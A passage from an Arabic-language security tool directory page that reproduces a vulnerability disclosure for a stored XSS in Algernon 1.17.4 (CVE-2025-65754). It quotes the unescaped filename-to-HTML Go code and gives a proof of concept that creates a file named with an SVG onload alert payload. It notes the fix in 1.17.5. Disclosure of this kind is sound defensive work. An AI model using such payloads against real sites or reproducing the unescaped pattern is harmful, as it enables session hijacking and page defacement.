Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-65754 — يتأثر الإصدار Algernon v1.17.4 بثغرة أمنية من نوع Cross-Site Scripting (XSS) تسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية عبر إدخال حمولات مخترقة في اسم ملف. | Kitploit
أدوات/GitHubGitHub/bnyt7/cve-2025-65754
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubbnyt7/cve-2025-65754

CVE-2025-65754

يتأثر الإصدار Algernon v1.17.4 بثغرة أمنية من نوع Cross-Site Scripting (XSS) تسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية عبر إدخال حمولات مخترقة في اسم ملف.

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-65754 : XSS مخزَّن في Algernon 1.17.4

الوصف

يتأثر Algernon v1.17.4 بثغرة تخزينية لتنفيذ البرامج النصية عبر المواقع (XSS) تسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصمَّمة في اسم ملف.

  • المشروع المتأثر : Algernon - 1.17.4
  • صيانة المشروع : Alexander F. Rødseth (xyproto)
  • نوع الثغرة : Cross-Site Scripting (XSS)
  • ناقل الهجوم : يمكن للمهاجم رفع ملفات بأسماء ضارة لتغيير محتوى موقع الويب أو سرقة ملفات تعريف الارتباط (الكوكيز) لاختطاف الجلسات.

لم يتم تنظيف بعض المتغيرات. على سبيل المثال :

engine/dirhandler.go الأسطر 80-108

root@kitploit:~

filename := item.Name()  // Get filename from filesystem
// ...
buf.WriteString(themes.HTMLLink(filename, URLpath, ac.fs.IsDir(fullFilename)))

themes/html.go الأسطر 124-132

root@kitploit:~
func HTMLLink(text, url string, isDirectory bool) string {
    if isDirectory {
        text += "/"
        url += "/"
    }
    return "<a href=\"/" + url + "\">" + text + "</a><br>"
    // 'text' (filename) is inserted directly without HTML escaping
}

يتم إدراج أسماء الملفات من نظام الملفات مباشرةً في HTML دون هروب في قوائم الدليل.

PoC

root@kitploit:~
$ algernon -v                                  
Algernon 1.17.4

في دليل، قم بإنشاء ملفات بأسماء تحتوي على حمولات XSS.

root@kitploit:~
# XSS Payload 1: Simple alert
$touch "test.txt"

# XSS Payload 2: Event handler in filename
$touch "document<svg onload=alert(document.domain)>.svg"

في نفس المستودع، قم بتشغيل التطبيق.

root@kitploit:~
algernon
root@kitploit:~
Server directory:       .
Server address:         :3000
Database:               Bolt (/tmp/algernon.db)
Cache mode:             On
Cache size:             1048576 bytes
TLS certificate:        cert.pem
TLS key:                key.pem
Request limit:          10/sec per visitor
Large file threshold:   44040192 bytes
Large file timeout:     10 sec
INFO[0000] Serving HTTP/2 on https://localhost:3000/    
ERRO[0000] open cert.pem: no such file or directory. Not serving HTTP/2. 
INFO[0000] Use the -t flag for serving regular HTTP.    
INFO[0000] Serving HTTP on http://localhost:3000/      

قم بزيارة الرابط التالي، سيظهر تنبيه.

تنبيه XSS باستخدام onerror

تنبيه XSS باستخدام موقع المستند

الملفات

تم الآن إصلاح هذه المشكلة في الإصدار v1.17.5.

المراجع

  • https://algernon.roboticoverlords.org/
  • https://github.com/xyproto/algernon/releases/tag/v1.17.5
  • https://github.com/xyproto/algernon/commit/cd8832014a624a9aeab60566434c3344135e23f8

المكتشف : Benoit H. (Bnyt7)

تنزيل الأداة